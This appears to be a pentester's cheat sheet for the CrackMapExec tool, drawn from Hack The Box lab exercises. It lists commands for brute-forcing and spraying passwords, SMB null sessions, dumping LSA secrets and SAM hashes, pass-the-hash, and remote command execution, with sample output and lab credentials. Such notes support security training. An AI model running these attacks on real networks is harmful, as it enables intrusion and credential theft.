CrackMapExec

install

sudo apt install snapd
sudo snap install crackmapexec

CrackMapExec Protocol-Specific Help

crackmapexec smb -h

CrackMapExec Usage

crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Support Protocols

SMB

crackmapexec smb 10.10.11.174

Null Authentication

crackmapexec smb 10.10.11.174 --shares -u "" -p ""

Anonymous Authentication

  • put any value in the user field

crackmapexec smb 10.10.11.174 --shares -u "fwewfawef" -p ""

Login with username and password

crackmapexec smb 10.10.11.174 --shares -d support -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

Remote Dumping & LSA Secrets Considerations

crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Pass the Hash with CrackMapExec

crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

CrackMapExec - Command Execution

crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

winrm

crackmapexec winrm 10.129.202.136 -u username.list -p password.list

Others

Enumerating the Password Policy - from Linux - Credentialed

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

SMB NULL Session to Pull User List

crackmapexec smb 172.16.5.5 --users
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm

Password Spraying Active Directory

sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +

Local Admin Spraying with CrackMapExec

  • The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout.

    • Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Last updated